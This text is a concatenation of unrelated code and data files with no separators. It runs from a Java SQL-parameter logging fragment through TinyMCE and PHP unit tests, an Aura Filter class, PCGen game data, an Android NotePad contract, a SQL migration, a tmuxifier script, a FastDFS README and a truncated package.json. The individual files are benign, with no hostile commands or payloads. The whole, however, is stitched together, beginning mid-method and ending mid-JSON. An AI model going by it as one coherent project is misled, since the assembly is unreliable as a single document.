Pattern pattern = Pattern.compile(rgex);
Matcher m = pattern.matcher(content);
int index = 1;
while (m.find()) {
String paramName = m.group(1);
Property prop = paramsPropsMap.get(paramName);
sqlParamsMap.put(index,prop);
index ++;
}
}
/**
* print replace sql
* @param content content
* @param formatSql format sql
* @param rgex rgex
* @param sqlParamsMap sql params map
*/
public void printReplacedSql(String content, String formatSql,String rgex, Map<Integer,Property> sqlParamsMap){
        // print the prepared sql and its bound parameters
        logger.info("after replacing placeholders, the prepared sql is : {}", formatSql);
StringBuilder logPrint = new StringBuilder("replaced sql , parameters:");
for(int i=1;i<=sqlParamsMap.size();i++){
logPrint.append(sqlParamsMap.get(i).getValue()+"("+sqlParamsMap.get(i).getType()+")");
}
logger.info("Sql Params are {}", logPrint);
}
}
/**
* @author Qi Liu / https://github.com/lq3297401
*/
var JuicyCakeStyle = ( function () {
return {
color: {
surface: 0xCE26D4,
selected: 0xE8F000,
in: 0xF7BB2F,
out: 0xE155AB,
halo: 0xF9A6FF,
background: 0x000000
},
brightness: {
ocean: 0.5,
mentioned: 0.5,
related: 0.5
}
}
}() );
export { JuicyCakeStyle };
import { Assertions } from '@ephox/agar';
import { UnitTest } from '@ephox/bedrock-client';
import { Arr } from '@ephox/katamari';
import * as Newlines from 'tinymce/plugins/paste/core/Newlines';
import PastePlugin from 'tinymce/plugins/paste/Plugin';
import Theme from 'tinymce/themes/silver/Theme';
UnitTest.test('tinymce.plugins.paste.browser.NewlinesTest', function () {
Theme();
PastePlugin();
// testing Newlines.isPlainText()
const textCases = [
{
label: 'TestCase-TBA: Paste: Basic Chrome markup (including span-wrapped tab)',
content: '<div><span style="white-space:pre"> </span>a</div><div><br></div><div>b</div>',
isText: true
},
{
label: `TestCase-TBA: Paste: Case shouldn't matter`,
content: '<DIV>a</DIV><DIV><BR></DIV>',
isText: true
},
{
label: 'TestCase-TBA: Paste: Support all BR types',
content: '<br><br />',
isText: true
},
{
label: 'TestCase-TBA: Paste: Basic IE markup',
content: '<p>a</p><p><br></p><p>b</p>',
isText: true
},
{
label: 'TestCase-TBA: Paste: White-space wrapper (Chrome)',
content: '<div><span style="white-space: pre;"> </span>a</div>',
isText: true
},
{
label: 'TestCase-TBA: Paste: White-space wrapper (Chrome) with additional styles',
content: '<div><span style="white-space: pre; color: red;"> </span>a</div>',
isText: false
},
{
label: 'TestCase-TBA: Paste: Allowed tag but with attributes qualifies string as not a plain text',
content: '<br data-mce-bogus="all" />',
isText: false
}
];
// only DIV,P,BR and SPAN[style="white-space:pre"] tags are allowed in "plain text" string
Arr.each(
('a,abbr,address,article,aside,audio,b,bdi,bdo,blockquote,button,cite,' +
'code,del,details,dfn,dl,em,embed,fieldset,figure,footer,form,h1,h2,h3,' +
'h4,h5,h6,header,hgroup,hr,i,ins,label,menu,nav,noscript,object,ol,pre,' +
'q,s,script,section,select,small,strong,style,sub,sup,svg,table,textarea,' +
'time,u,ul,var,video,wbr').split(','),
function (tag) {
const content = '<p>a</p><' + tag + '>b</' + tag + '><p>c<br>d</p>';
textCases.push({
label: tag.toUpperCase() + ' tag should qualify content (' + content + ') as not a plain text',
content,
isText: false
});
}
);
Arr.each(textCases, function (c) {
Assertions.assertEq(c.label || 'Asserting: ' + c.content, c.isText, Newlines.isPlainText(c.content));
});
});
<?php
include_once dirname(__FILE__) . '/../../../bootstrap/unit.php';
include_once dirname(__FILE__) . '/../../../bootstrap/database.php';
$t = new lime_test(4);
//------------------------------------------------------------
$t->diag('BannerImage: Cascading Delete');
$conn->beginTransaction();
$bannerImage = Doctrine_Core::getTable('BannerImage')->find(1);
$bannerUseImage = $bannerImage->BannerUseImage[0];
$file = $bannerImage->File;
$bannerImage->delete($conn);
$t->ok(!Doctrine_Core::getTable('BannerImage')->find($bannerImage->id), 'banner_image is deleted.');
$t->ok(!Doctrine_Core::getTable('BannerUseImage')->find($bannerUseImage->id), 'banner_use_image is deleted.');
$t->ok(!Doctrine_Core::getTable('File')->find($file->id), 'file is deleted.');
$t->ok(!Doctrine_Core::getTable('FileBin')->find($file->id), 'file_bin is deleted.');
$conn->rollback();
<?php
/**
*
* This file is part of Aura for PHP.
*
* @license http://opensource.org/licenses/bsd-license.php BSD
*
*/
namespace Aura\Filter\Failure;
use JsonSerializable;
/**
*
* Represents the failure of a rule specification.
*
* @package Aura.Filter
*
*/
class Failure implements JsonSerializable
{
/**
*
* The field that failed.
*
* @var string
*
*/
protected $field;
/**
*
* The failure message.
*
* @var string
*
*/
protected $message;
/**
*
* The arguments passed to the rule specification.
*
* @var array
*
*/
protected $args = array();
/**
*
* Constructor.
*
* @param string $field The field that failed.
*
* @param string $message The failure message.
*
* @param array $args The arguments passed to the rule specification.
*
* @return self
*
*/
public function __construct(
$field,
$message,
array $args = array()
) {
$this->field = $field;
$this->message = $message;
$this->args = $args;
}
/**
*
* Returns the field that failed.
*
* @return string
*
*/
public function getField()
{
return $this->field;
}
/**
*
* Returns the failure message.
*
* @return string
*
*/
public function getMessage()
{
return $this->message;
}
/**
*
* Returns the arguments passed to the rule specification.
*
* @return array
*
*/
public function getArgs()
{
return $this->args;
}
/**
*
* Returns an array for json_encode.
*
* @return array
*
*/
public function jsonSerialize()
{
return array(
'field' => $this->field,
'message' => $this->message,
'args' => $this->args,
);
}
}
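// Illustrative usage (hypothetical values; not part of the original class):
//
//   $failure = new Failure('email', 'Email is not valid.', array('strict' => true));
//   echo json_encode($failure);
//   // {"field":"email","message":"Email is not valid.","args":{"strict":true}}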
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
xmlns:html="http://www.w3.org/1999/xhtml"
class="reftest-wait">
<script type="text/javascript"><![CDATA[
function run() {
const XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
const HTML_NS = "http://www.w3.org/1999/xhtml";
var window = document.getElementsByTagName("window")[0];
var span = document.createElementNS(HTML_NS, "html:span");
window.appendChild(span); // causes block wrapping
setTimeout(finish, 0);
}
function finish() {
document.documentElement.removeAttribute("class");
}
function load(event) {
setTimeout(run, 0);
}
window.addEventListener("load", load, false);
]]></script>
<box flex="1" />
<label value="hello world" />
</window>
# Fri Nov 16 19:52:40 2018 -- reformated by PCGen PrettyLST v6.08.00
# CVS $Revision: $ $Author: $ -- Thu Nov 26 22:25:37 2015 -- reformated by PCGen PrettyLST v6.05.01
#SOURCELONG:Occult Adventures SOURCESHORT:OA SOURCEWEB:http://paizo.com/products/btpy9a0h
# Class feature types
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Kineticist Class Feature.KineticistClassFeatures PLURAL:Kineticist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Medium Class Feature.MediumClassFeatures PLURAL:Medium Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Mesmerist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Mesmerist Class Feature.MesmeristClassFeatures PLURAL:Mesmerist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Occultist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Occultist Class Feature.OccultistClassFeatures PLURAL:Occultist Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Psychic Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Psychic Class Feature.PsychicClassFeatures PLURAL:Psychic Class Features DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Spiritualist Class Feature VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Spiritualist Class Feature.SpiritualistClassFeatures PLURAL:Spiritualist Class Features DISPLAYLOCATION:Class Features
# Archetypes
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Kineticist Archetype.KineticistArchetype PLURAL:Kineticist Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Medium Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Medium Archetype.MediumArchetype PLURAL:Medium Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Mesmerist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Mesmerist Archetype.MesmeristArchetype PLURAL:Mesmerist Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Occultist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Occultist Archetype.OccultistArchetype PLURAL:Occultist Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Psychic Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Psychic Archetype.PsychicArchetype PLURAL:Psychic Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Spiritualist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Spiritualist Archetype.SpiritualistArchetype PLURAL:Spiritualist Archetypes DISPLAYLOCATION:Archetype
# Kineticist class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Blast Type VISIBLE:NO EDITABLE:NO EDITPOOL:YES FRACTIONALPOOL:NO CATEGORY:Kineticist Blast Type
ABILITYCATEGORY:Kineticist Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:Wild Talent PLURAL:Kineticist Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Element VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistElementalFocus CATEGORY:Special Ability TYPE:Kineticist Element PLURAL:Kineticist Elements DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Blast VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Simple Blast PLURAL:Simple Blasts DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Expanded Element VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistExpandedElement CATEGORY:Special Ability TYPE:Kineticist Expanded Element PLURAL:Kineticist Expanded Elements DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Utility Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistUtilityWildTalents CATEGORY:Special Ability TYPE:Utility Wild Talent PLURAL:Utility Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistInfusion CATEGORY:Special Ability TYPE:Infusion Wild Talent PLURAL:Infusion Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Aether VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Aether.Utility Wild Talent Aether DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Air VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Air.Utility Wild Talent Air DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Earth VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Earth.Utility Wild Talent Earth DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Fire VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Fire.Utility Wild Talent Fire DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Water VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Water.Utility Wild Talent Water DISPLAYLOCATION:Class Features
# Occultist class features
ABILITYCATEGORY:Occultist Mental Focus VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:OccultistMentalFocus PLURAL:Occultist Mental Foci DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Occultist Physical Enhancement VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:OccultistPhysicalEnhancement PLURAL:Occultist Physical Enhancements DISPLAYLOCATION:Class Features
# Medium class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Medium Spirit Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumSpirit PLURAL:Medium Spirit Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Champion Weapon Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:ChampionWeapon PLURAL:Champion Weapon Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Champion Feat Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:ChampionFeat PLURAL:Champion Feat Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Hierophant Energy Font Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:HierophantEnergyFont PLURAL:Hierophant Energy Font Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Marshal Seance Boon VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:SeanceBoon PLURAL:Marshal Seance Boons DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Trickster Seance Boon VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:TricksterBoon PLURAL:Trickster Seance Boons DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Trickster Skill Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:TricksterSkill PLURAL:Trickster Skill Choices DISPLAYLOCATION:Class Features
# Bonus wizard spells
ABILITYCATEGORY:Medium Wizard Spell 0 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard0 PLURAL:Medium Wizard Spells 0 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 1 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard1 PLURAL:Medium Wizard Spells 1 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 2 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard2 PLURAL:Medium Wizard Spells 2 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 3 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard3 PLURAL:Medium Wizard Spells 3 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 4 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard4 PLURAL:Medium Wizard Spells 4 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 5 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard5 PLURAL:Medium Wizard Spells 5 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 6 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard6 PLURAL:Medium Wizard Spells 6 DISPLAYLOCATION:Class Features
# Bonus cleric spells
ABILITYCATEGORY:Medium Cleric Spell 0 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric0 PLURAL:Medium Cleric Spells 0 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 1 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric1 PLURAL:Medium Cleric Spells 1 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 2 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric2 PLURAL:Medium Cleric Spells 2 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 3 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric3 PLURAL:Medium Cleric Spells 3 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 4 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric4 PLURAL:Medium Cleric Spells 4 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 5 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric5 PLURAL:Medium Cleric Spells 5 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 6 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric6 PLURAL:Medium Cleric Spells 6 DISPLAYLOCATION:Class Features
# Mesmerist class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Mesmerist Trick Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MesmeristTrick PLURAL:Mesmerist Trick Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Bold Stare Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:BoldStare PLURAL:Bold Stare Choices DISPLAYLOCATION:Class Features
# Mesmerist archetype class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Injection Improvement Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:InjectionImprovement PLURAL:Injection Improvement Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Vexing Daredevil Martial Weapon Proficiency VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:VexingDaredevilWpnProf PLURAL:Vexing Daredevil Martial Weapon Proficiencies DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Vexing Daredevil Bonus Stare Feat VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Feat TYPE:Stare PLURAL:Vexing Daredevil Bonus Stare Feats DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Dazzling Feint Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:DazzlingFeint PLURAL:Dazzling Feint Choices DISPLAYLOCATION:Class Features
###
ABILITYCATEGORY:Phrenic Amplification VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Phrenic Amplification PLURAL:Phrenic Amplifications DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Psychic Discipline VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Psychic Discipline PLURAL:Psychic Disciplines DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Phantom Emotional Focus VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Phantom Emotional Focus PLURAL:Emotional Focuses DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Phantom Manifestation	VISIBLE:QUALIFY	EDITABLE:YES	EDITPOOL:NO	CATEGORY:Special Ability	TYPE:Phantom Manifestation	PLURAL:Phantom Manifestations	DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Phantom Size	VISIBLE:QUALIFY	EDITABLE:YES	EDITPOOL:NO	CATEGORY:Internal	TYPE:Phantom Size	PLURAL:Phantom Sizes	DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Implement School VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:OccultistImplementSchool CATEGORY:Special Ability TYPE:Implement School PLURAL:Implement Schools DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Implement School Focus Power VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:OccultistFocusPower CATEGORY:Special Ability TYPE:Implement School Focus Power PLURAL:Implement School Focus Powers DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Homunculus Companion Custom Skills VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:HomunculusCompanionCustomSkills DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Homunculus Companion Ability Increase VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:HomunculusCompanionAbilityIncrease PLURAL:Homunculus Companion Ability Increases DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Elemental Annihilator Feat VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES FRACTIONALPOOL:NO CATEGORY:Internal TYPE:Elemental Annihilator Feat DISPLAYLOCATION:Feats
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.example.android.notepad;
import android.net.Uri;
import android.provider.BaseColumns;
/**
* Defines a contract between the Note Pad content provider and its clients. A contract defines the
* information that a client needs to access the provider as one or more data tables. A contract
* is a public, non-extendable (final) class that contains constants defining column names and
* URIs. A well-written client depends only on the constants in the contract.
*/
public final class NotePad {
public static final String AUTHORITY = "com.google.provider.NotePad";
// This class cannot be instantiated
private NotePad() {
}
/**
* Notes table contract
*/
public static final class Notes implements BaseColumns {
// This class cannot be instantiated
private Notes() {}
/**
* The table name offered by this provider
*/
public static final String TABLE_NAME = "notes";
/*
* URI definitions
*/
/**
* The scheme part for this provider's URI
*/
private static final String SCHEME = "content://";
/**
* Path parts for the URIs
*/
/**
* Path part for the Notes URI
*/
private static final String PATH_NOTES = "/notes";
/**
* Path part for the Note ID URI
*/
private static final String PATH_NOTE_ID = "/notes/";
/**
* 0-relative position of a note ID segment in the path part of a note ID URI
*/
public static final int NOTE_ID_PATH_POSITION = 1;
/**
* Path part for the Live Folder URI
*/
private static final String PATH_LIVE_FOLDER = "/live_folders/notes";
/**
* The content:// style URL for this table
*/
public static final Uri CONTENT_URI = Uri.parse(SCHEME + AUTHORITY + PATH_NOTES);
/**
* The content URI base for a single note. Callers must
* append a numeric note id to this Uri to retrieve a note
*/
public static final Uri CONTENT_ID_URI_BASE
= Uri.parse(SCHEME + AUTHORITY + PATH_NOTE_ID);
/**
* The content URI match pattern for a single note, specified by its ID. Use this to match
* incoming URIs or to construct an Intent.
*/
public static final Uri CONTENT_ID_URI_PATTERN
= Uri.parse(SCHEME + AUTHORITY + PATH_NOTE_ID + "/#");
/**
* The content Uri pattern for a notes listing for live folders
*/
public static final Uri LIVE_FOLDER_URI
= Uri.parse(SCHEME + AUTHORITY + PATH_LIVE_FOLDER);
/*
* MIME type definitions
*/
/**
* The MIME type of {@link #CONTENT_URI} providing a directory of notes.
*/
public static final String CONTENT_TYPE = "vnd.android.cursor.dir/vnd.google.note";
/**
* The MIME type of a {@link #CONTENT_URI} sub-directory of a single
* note.
*/
public static final String CONTENT_ITEM_TYPE = "vnd.android.cursor.item/vnd.google.note";
/**
* The default sort order for this table
*/
public static final String DEFAULT_SORT_ORDER = "modified DESC";
/*
* Column definitions
*/
/**
* Column name for the title of the note
* <P>Type: TEXT</P>
*/
public static final String COLUMN_NAME_TITLE = "title";
/**
* Column name of the note content
* <P>Type: TEXT</P>
*/
public static final String COLUMN_NAME_NOTE = "note";
/**
* Column name for the creation timestamp
 * <P>Type: INTEGER (long from System.currentTimeMillis())</P>
*/
public static final String COLUMN_NAME_CREATE_DATE = "created";
/**
* Column name for the modification timestamp
 * <P>Type: INTEGER (long from System.currentTimeMillis())</P>
*/
public static final String COLUMN_NAME_MODIFICATION_DATE = "modified";
}
}
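/*
 * Illustrative sketch (not part of the original sample): how a client might
 * combine the contract constants above. ContentUris.withAppendedId() appends
 * a numeric row ID to CONTENT_ID_URI_BASE, producing a URI that matches
 * CONTENT_ID_URI_PATTERN. The helper class name is hypothetical.
 */
final class NotePadUris {
    // This class cannot be instantiated
    private NotePadUris() {}
    /**
     * Returns the content URI for the single note with the given row ID.
     */
    static Uri noteUri(long noteId) {
        return android.content.ContentUris.withAppendedId(
                NotePad.Notes.CONTENT_ID_URI_BASE, noteId);
    }
}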
-- This file should undo anything in `up.sql`
ALTER TABLE notifications ADD COLUMN title VARCHAR NOT NULL;
ALTER TABLE notifications ADD COLUMN content TEXT;
ALTER TABLE notifications ADD COLUMN link VARCHAR;
ALTER TABLE notifications ADD COLUMN data VARCHAR;
ALTER TABLE notifications DROP COLUMN kind;
ALTER TABLE notifications DROP COLUMN object_id;
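-- For reference, the matching `up.sql` presumably performs the inverse
-- migration (a sketch only; the column types of `kind` and `object_id` are
-- assumptions, not taken from the actual file):
--
-- ALTER TABLE notifications ADD COLUMN kind VARCHAR NOT NULL;
-- ALTER TABLE notifications ADD COLUMN object_id INTEGER NOT NULL;
-- ALTER TABLE notifications DROP COLUMN title;
-- ALTER TABLE notifications DROP COLUMN content;
-- ALTER TABLE notifications DROP COLUMN link;
-- ALTER TABLE notifications DROP COLUMN data;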
#! /usr/bin/env bash
set -e
[ -n "$TMUXIFIER_DEBUG" ] && set -x
# Load internal utility functions.
source "$TMUXIFIER/lib/util.sh"
# Provide tmuxifier help
if calling-help "$@"; then
echo "usage: tmuxifier load-window <layout_name | file_path>
Aliases: window, win, w
Create a new window using the specified window layout in the current session.
Arguments:
<layout_name | file_path> - Name of a window layout stored in the layouts
directory, or path to a window layout file."
exit
fi
# Provide tmuxifier completions
if calling-complete "$@"; then
tmuxifier-list-windows
exit
fi
if [ -z "$1" ]; then
echo "$(tmuxifier-help load-window $@)" >&2
exit 1
fi
# Load runtime functions.
source "$TMUXIFIER/lib/runtime.sh"
if [ -n "$TMUX" ]; then
session="$(tmuxifier-current-session)"
load_window "$1"
else
echo "tmuxifier: 'load-window' command can only be used from within Tmux."
exit 1
fi
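# Example usage (illustrative): from inside a tmux session,
#
#   tmuxifier load-window example
#
# creates a new window in the current session from the "example" window
# layout, typically a file named example.window.sh in the tmuxifier
# layouts directory.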
fileFormatVersion: 2
guid: efee954c69f0d421086729bb8df1137f
timeCreated: 1490044676
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: -221
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
Copyright (C) 2008 Happy Fish / YuQing
FastDFS may be copied only under the terms of the GNU General
Public License V3, which may be found in the FastDFS source kit.
Please visit the FastDFS Home Page for more detail.
Chinese language: http://www.fastken.com/
FastDFS is an open source, high performance distributed file system. Its major
functions include file storing, file syncing and file accessing (file uploading
and file downloading), and it addresses the high capacity and load balancing
problems. FastDFS should meet the requirements of websites whose services are
based on files, such as photo sharing sites and video sharing sites.
FastDFS has two roles: tracker and storage. The tracker takes charge of
scheduling and load balancing for file access. The storage servers store files
and handle file management, including file storing, file syncing and providing
the file access interface. They also manage the metadata: attributes of a file
represented as key-value pairs. For example, given width=1024, the key is
"width" and the value is "1024".
The tracker and storage roles each consist of one or more servers. Servers can
be added to or removed from the tracker or storage cluster at any time without
affecting the online services. The servers in the tracker cluster are peers.
The storage servers are organized into file volumes (groups) to obtain high
capacity. The storage system contains one or more volumes, and the files in
different volumes are independent of one another. The capacity of the whole
storage system equals the sum of all volumes' capacities. A file volume
contains one or more storage servers that hold the same set of files; the
servers in a volume back each other up, and load is balanced across all of
them. When a storage server is added to a volume, files already existing in
that volume are replicated to the new server automatically, and when the
replication is done, the system switches the server online to provide storage
services.
When the overall storage capacity is insufficient, you can add one or more
volumes to expand it. To do this, you need to add one or more storage
servers.
The identification of a file is composed of two parts: the volume name and
the file name; an ID such as group1/M00/00/00/example.jpg (illustrative)
combines the two.
For client test code that uses the client library, please refer to the
directory client/test.
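Example (illustrative): with the bundled command line client, an upload
typically looks like

    fdfs_upload_file /etc/fdfs/client.conf local_file.jpg

which prints the resulting file ID (volume/group name plus remote file name).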
For more FastDFS related articles, please subscribe to the WeChat/Weixin
public account (Chinese language): fastdfs
{
"name": "methods",
"version": "1.1.0",
"description": "HTTP methods that node supports",
"main": "index.js",
"scripts": {
"test": "./node_modules/mocha/bin/mocha"
},
"keywords": [
"http",
